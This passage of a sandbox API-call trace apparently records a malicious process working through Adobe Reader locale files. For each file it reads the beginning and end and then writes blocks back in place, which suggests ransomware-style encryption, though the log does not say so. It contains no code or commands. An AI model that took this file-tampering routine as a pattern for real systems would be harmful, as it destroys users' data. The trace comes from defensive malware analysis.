lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0076.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.RUS", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.RUS", lpUsedDefaultChar=0x0) returned 9 [0076.407] ReadFile (in: hFile=0x1d4, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x345f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0076.409] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0076.409] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x345f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0076.409] CloseHandle (hObject=0x1d4) returned 1 [0076.410] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\ReadOutLoud.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\readoutloud.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.411] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.411] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2c00 [0076.411] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.411] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.411] ReleaseMutex (hMutex=0x168) returned 1 [0076.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.RUS", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0076.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.RUS", cchWideChar=15, lpMultiByteStr=0x1f732cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.RUS", lpUsedDefaultChar=0x0) returned 15 [0076.412] ReadFile (in: hFile=0x1d4, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.630] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1c00 [0076.636] ReadFile (in: hFile=0x1d4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.642] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1c00 [0076.663] WriteFile (in: hFile=0x1d4, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.665] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0076.665] WriteFile (in: hFile=0x1d4, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.665] CloseHandle (hObject=0x1d4) returned 1 [0076.665] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Updater.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\updater.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0077.095] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.095] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2800 [0077.095] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.099] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.099] ReleaseMutex (hMutex=0x168) returned 1 [0077.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.RUS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.RUS", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Updater.RUS", lpUsedDefaultChar=0x0) returned 11 [0077.103] ReadFile (in: hFile=0x1e8, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.114] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1800 [0077.115] ReadFile (in: hFile=0x1e8, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.115] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1800 [0077.115] WriteFile (in: hFile=0x1e8, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.115] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0077.116] WriteFile (in: hFile=0x1e8, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.116] CloseHandle (hObject=0x1e8) returned 1 [0077.116] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\DigSig.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\digsig.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0077.118] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.118] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1ea00 [0077.118] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.118] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.119] ReleaseMutex (hMutex=0x168) returned 1 [0077.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.SKY", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0077.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.SKY", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.SKY", lpUsedDefaultChar=0x0) returned 10 [0077.119] ReadFile (in: hFile=0x1e8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0077.121] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1da00 [0077.121] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.122] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1da00 [0077.123] WriteFile (in: hFile=0x1e8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.123] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0077.123] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.123] CloseHandle (hObject=0x1e8) returned 1 [0077.123] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\PPKLite.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\ppklite.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0077.124] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.125] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7e000 [0077.125] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.125] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.125] ReleaseMutex (hMutex=0x168) returned 1 [0077.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.SKY", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.SKY", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLite.SKY", lpUsedDefaultChar=0x0) returned 11 [0077.125] ReadFile (in: hFile=0x1e8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0077.127] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7d000 [0077.127] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.129] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7d000 [0077.129] WriteFile (in: hFile=0x1e8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.130] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0077.130] WriteFile (in: hFile=0x1e8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0077.130] CloseHandle (hObject=0x1e8) returned 1 [0077.130] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0077.131] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.131] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe7 [0077.131] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.131] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.131] ReleaseMutex (hMutex=0x168) returned 1 [0077.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0077.131] ReadFile (in: hFile=0x1e8, lpBuffer=0x26bedf8, nNumberOfBytesToRead=0xe7, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bedf8*, lpNumberOfBytesRead=0x345f2bc*=0xe7, lpOverlapped=0x0) returned 1 [0077.132] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0077.132] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x66f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x345f2d0*=0x66f, lpOverlapped=0x0) returned 1 [0077.132] CloseHandle (hObject=0x1e8) returned 1 [0077.133] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\BRdlang32.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\brdlang32.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0077.134] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.134] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3400 [0077.134] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.134] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.134] ReleaseMutex (hMutex=0x168) returned 1 [0077.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.SLV", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.SLV", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.SLV", lpUsedDefaultChar=0x0) returned 13 [0077.134] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.136] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2400 [0077.136] ReadFile (in: hFile=0x1e8, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.137] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2400 [0077.137] WriteFile (in: hFile=0x1e8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.137] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0077.137] WriteFile (in: hFile=0x1e8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.137] CloseHandle (hObject=0x1e8) returned 1 [0077.137] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Multimedia.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\multimedia.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0077.138] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.138] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x13400 [0077.138] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.138] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.138] ReleaseMutex (hMutex=0x168) returned 1 [0077.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.SLV", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0077.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.SLV", cchWideChar=14, lpMultiByteStr=0x1f735ec, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.SLV", lpUsedDefaultChar=0x0) returned 14 [0077.138] ReadFile (in: hFile=0x1e8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0077.140] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x12400 [0077.140] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.141] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x12400 [0077.141] WriteFile (in: hFile=0x1e8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.141] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0077.142] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.142] CloseHandle (hObject=0x1e8) returned 1 [0077.142] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\SendMail.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\sendmail.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0077.143] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.143] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3c00 [0077.143] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.143] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.143] ReleaseMutex (hMutex=0x168) returned 1 [0077.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.SLV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.SLV", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.SLV", lpUsedDefaultChar=0x0) returned 12 [0077.144] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.145] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2c00 [0077.146] ReadFile (in: hFile=0x1e8, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.146] SetFilePointer (in: hFile=0x1e8, 